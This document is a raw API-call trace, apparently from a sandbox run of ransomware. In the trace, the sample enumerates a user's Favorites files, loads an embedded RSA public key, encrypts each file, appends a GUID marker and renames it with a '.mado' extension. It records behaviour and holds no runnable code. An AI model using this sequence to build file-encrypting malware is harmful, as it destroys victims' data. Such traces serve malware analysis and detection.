RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.270] GetCurrentThreadId () returned 0x600 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68a08 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.270] GetCurrentThreadId () returned 0x600 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c64e8 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe760 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe730 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe700 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe778 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe748 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe790 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe760 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe790 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6edb0 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eec8 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe748 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe778 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe730 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe700 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b814b8 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.274] WriteFile (in: hFile=0x63c, lpBuffer=0x32b69d8*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x32b69d8*, lpNumberOfBytesWritten=0x39cfb14*=0xe7, lpOverlapped=0x0) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.274] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.274] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0205.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.275] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.275] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.275] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.275] CloseHandle (hObject=0x63c) returned 1 [0205.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0205.276] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.mado")) returned 1 [0205.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.276] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee30 | out: hHeap=0x2c0000) returned 1 [0205.278] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0205.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32fecb0 [0205.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0205.278] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0205.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.278] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=226) returned 1 [0205.278] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.280] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.280] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.281] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.281] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe2, lpOverlapped=0x0) returned 1 [0205.281] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.281] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.281] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.281] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0205.282] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.282] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.282] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.282] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.282] GetLastError () returned 0x0 [0205.282] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.283] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0205.283] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.283] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.283] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0205.283] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.283] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.283] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.283] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.283] CloseHandle (hObject=0x63c) returned 1 [0205.284] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.mado")) returned 1 [0205.286] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0205.286] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.286] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.286] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.286] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0205.286] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" 